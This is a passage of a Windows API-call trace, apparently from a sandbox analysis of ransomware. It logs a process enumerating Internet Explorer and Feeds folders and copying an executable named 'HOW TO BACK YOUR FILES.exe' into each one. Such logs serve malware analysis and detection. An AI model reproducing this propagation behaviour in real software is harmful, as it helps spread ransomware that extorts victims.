dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.889] GetLastError () returned 0x0 [0065.889] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.890] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.890] CloseHandle (hObject=0x154) returned 1 [0065.890] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.890] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5866cae0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5866cae0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.890] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.890] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.890] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" [0065.890] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache" [0065.890] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.890] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.891] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.891] GetLastError () returned 0x0 [0065.891] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.891] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.891] CloseHandle (hObject=0x154) returned 1 [0065.891] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.891] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x586b8da0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x586b8da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.891] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.891] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.892] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0065.892] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD" [0065.892] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.892] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\kqmhsvkd\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.892] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.892] GetLastError () returned 0x0 [0065.892] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.892] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.893] CloseHandle (hObject=0x154) returned 1 [0065.893] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.893] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\KQMHSVKD\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5872b1c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5872b1c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.893] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.893] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.893] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0065.893] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ" [0065.893] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.893] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\d68g7bij\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.894] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.894] GetLastError () returned 0x0 [0065.894] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.894] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.894] CloseHandle (hObject=0x154) returned 1 [0065.894] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.894] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\D68G7BIJ\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x58777480, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58777480, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.894] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.894] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.894] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0065.895] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7" [0065.895] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.895] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\6asvn7j7\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.895] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.895] GetLastError () returned 0x0 [0065.895] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.895] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.895] CloseHandle (hObject=0x154) returned 1 [0065.896] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.896] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\6ASVN7J7\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x587c3740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x587c3740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.896] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.896] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.896] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0065.896] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR" [0065.896] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.896] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\feeds cache\\1nbur4hr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.897] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.897] GetLastError () returned 0x0 [0065.897] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.897] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.897] CloseHandle (hObject=0x154) returned 1 [0065.897] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.897] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds Cache\\1NBUR4HR\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5880fa00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5880fa00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.897] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.897] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.897] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds" [0065.897] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds" [0065.897] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.898] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\feeds\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.898] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.898] GetLastError () returned 0x0 [0065.898] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.898] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.898] CloseHandle (hObject=0x154) returned 1 [0065.898] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.899] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5880fa00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5880fa00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.899] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.899] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.899] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0065.899] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~" [0065.899] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.899] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.900] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.900] GetLastError () returned 0x0 [0065.900] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.900] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.900] CloseHandle (hObject=0x154) returned 1 [0065.900] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.900] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4ac52b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4ac52b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.900] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.900] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.900] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0065.900] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~" [0065.900] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.900] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Application Data\\Microsoft\\Feeds\\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\\WebSlices~\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\application data\\microsoft\\feeds\\{5588acfd-6436-411b-a5ce-666ae6a92d3d}~\\webslices~\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.901] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0065.901] GetLastError () returned 0x0 [0065.901] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.901] ReadFile (in: hFile=0x154, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.901] CloseHandle 